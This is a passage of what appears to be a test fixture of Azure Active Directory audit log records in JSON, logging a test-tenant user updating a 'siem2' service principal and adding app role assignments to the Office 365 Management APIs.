"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "99a3d3e3-e4f6-4de7-96e0-6333564e1b25"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:37", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": 
"Included Updated Properties", "OldValue": "", "NewValue": ""}, {"NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "811fd012-35a6-4a0c-abce-79fb08b9ab6c"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:37.2595378Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34620448"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": 
"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "99a3d3e3-e4f6-4de7-96e0-6333564e1b25"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:37", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"NewValue": 
"", "OldValue": "", "Name": "Included Updated Properties"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "811fd012-35a6-4a0c-abce-79fb08b9ab6c"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:37.2595378Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34620448"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": 
"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "99a3d3e3-e4f6-4de7-96e0-6333564e1b25"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:41", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem2"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Name\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:41.8071361Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622707"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": 
"env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "256e3859-87ca-4b23-b2c0-45a26ccd7925"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:41", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem2"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": 
"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Name\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": 
"{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:41.8821342Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622751"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "411fc666-cabf-4cb0-b8a3-e5a2cc515b79"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:41", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": 
"1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem2"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": 
"1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Name\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:41.9571526Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622781"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", 
"Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "a4a12952-3467-4d48-9950-48b4b9ac87b3"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:41", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": 
